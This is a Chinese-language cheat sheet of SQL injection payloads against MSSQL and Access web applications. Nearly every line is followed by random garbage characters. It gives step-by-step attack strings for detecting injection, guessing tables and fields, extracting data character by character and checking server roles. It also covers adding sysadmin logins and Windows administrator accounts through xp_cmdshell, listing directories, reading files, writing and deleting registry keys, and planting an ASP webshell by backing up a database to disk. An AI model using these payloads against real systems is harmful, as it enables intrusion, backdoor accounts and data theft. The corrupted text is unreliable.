1.判断是否有注入;and 1=1 ;and 1=2 Sz1�J4�$5�
2.初步判断是否是mssql ;and user>0 J�x`7W�1%T
+eLL�)��uk
3.注入参数是字符'and [查询条件] and ''=' }jWg&<5+�z
M5_��t#[ [
4.搜索时没过滤参数的'and [查询条件] and '%25'=' i 2uSPV!Tf
T�HK^u+~LM
5.判断数据库系统 w&�VDe(�:~
/!p�}�H'jl
;and (select count(*) from sysobjects)>0 mssql f;�,*�P,�K
0blbf@X�A
;and (select count(*) from msysobjects)>0 access f$dIPt�(�
� �fWs*u[S
)_o^�d>$da
4N7|LxNNl_
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ak�CCpnX_d
�z" ?�WT�$
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Wy�/h"R\=�
\��Gi�oSg
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 cd�Sgb�3B0
�����>+!Ef
9.(1)猜字段的ascii值(access) EaL>~�:��j
�TpYh�)=;k
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Pl`Nni��y�
UL%a^�' hR
(2)猜字段的ascii值(mssql) e�C6wrpZ�O
�pY\�=f�0]
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �*1�_Ef).�
�3%Q952�1�
10.测试权限结构(mssql) ����#��@1(
;/+U.�I%z
,i�;��#��e
�^�%LyT�!y
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ��Y5"HK�W^
�# M!1W5#�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �7+X~i@#rU
�6P,�uy;PJ
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- N:+d�=G�`x
�V� 7Z�GT
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �J�Z:yPv�J
GWW�aH+F[h
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- >�X�M]�UdP
:�Y�9/} b{
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �*_}0v�d��
�_�bgv �+/
;and 1=(select IS_MEMBER('db_owner'));-- �pW>{7pXn�
P�Qh �s^D�
HG�d��.meQ
0plX"�N�U
11.添加mssql和系统的帐户 F>�X<�=YO0
kh#��f�UAt
;exec master.dbo.sp_addlogin username;-- f�l2XI=[v4
;exec master.dbo.sp_password null,username,password;-- Y
ZuA"l �Y
\�W=
qqE]
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
fWi�/mK3c
�V s=���o@
;exec master.dbo.xp_cmdshell 'net user username password )��t\aB_ =
K"�X"�2c1o
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- M,�bs�`amz
5)h��fI7{d
;exec master.dbo.xp_cmdshell 'net user username password /add';-- =]"I0G-s!�
"�QiLu=�Rq
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- [�9NrPm3�d
0�?gH�RdU"
?0+�g.�,�9
e��:C4�f�
12.(1)遍历目录 �&,{YfAxQ`
{[L('M�H2|
;create table dirs(paths varchar(100), id int) \ �a(ce?C
3 ��5L0�CM
;insert dirs exec master.dbo.xp_dirtree 'c:\' ��iy]?j$B$
(-�&�d0a9N
;and (select top 1 paths from dirs)>0 hv\Dz*XTs0
Y}<%~z#.4
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �YV@efPy}n
B##X94aTT�
GC�fV�H?Vx
�R-1M��D
(2)遍历目录 �mF jM6pmo
�#r�eW)P�>
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
@'��;��.$
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Aq3\Q>klH)
6h %r��t]g
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 wp>
z0�4�
6CW5�ay_�,
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 *v��vm8i�k
���~�oT*�@
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 4�udj"�-V�
S'hUh'P��Z
�~{�vB2���
kY{�$[+-jR
13.mssql中的存储过程 L��NHi�}P~
>s0!�[c�oz
xp_regenumvalues 注册表根键, 子键 i27�)c)\BM
oDi�+\�0��
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Qh-:P`CN�
�n&?)gKL0g
xp_regread 根键,子键,键值名 Dh?���I���
Z�,U��s<du
;exec xp_regread 4�i^WE;|s�
�K{"h��f:k
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 W-/V5�=?
�
u*,>�$�(-u
xp_regwrite 根键,子键, 值名, 值类型, 值 )58��~2v�R
o;
U!{G(�X
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 N3��@�[�95
N#t`�ZC&m'
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �M�tN�!X�x
D3P/: ��4�
xp_regdeletevalue 根键,子键,值名 �c�F��8��X
oM
Z94�,�3
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 |\G^�:�V[.
�P?P.�QK��
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 %b�4tyX:N0
`ZI��-1&Y3
a_?b��<���
R*6B@<�p,i
14.mssql的backup创建webshell /wt7KL-�I�
5�7�gt�"�f
use model 4��K?
\5(b
J�Png !tvR
create table cmd(str image); �iR88L&�U>
c%gL3kO�T
insert into cmd(str) values (''); Q�r��4�� D
bcps�jUiy#
backup database model to disk='c:\l.asp'; 83�gWA>Odh
6�o(IL-0]c
N���R��p��
A>2�_�I)��
15.mssql内置函数 NM�f#0Nz-
g=@d!]Z~[�
;and (select @@version)>0 获得Windows的版本号 1# z�@�D�(
@|Yn~P�wKs
;and user_name()='dbo' 判断当前系统的连接用户是不是sa nw%�`CnzT
y�RXWd�*9�
;and (select user_name())>0 爆当前系统的连接用户 gkA_<�,�38
+���{V`{'�
;and (select db_name())>0 得到当前连接的数据库 �>��$E;."a
B%�M�dJ�D>
pq&[�cA_w�
K%x]:|,�>M
16.简洁的webshell g,]�m8%GHE
�J�@6j^�U�
use model t�H.L_< �N
QeuM',��6R
create table cmd(str image); �D�F��4CB#
@p�
WN5�VL
insert into cmd(str) values (''); P�M#3N2?|E
/W�E\�0b�f
backup database model to disk='g:\wwwtest\l.asp';
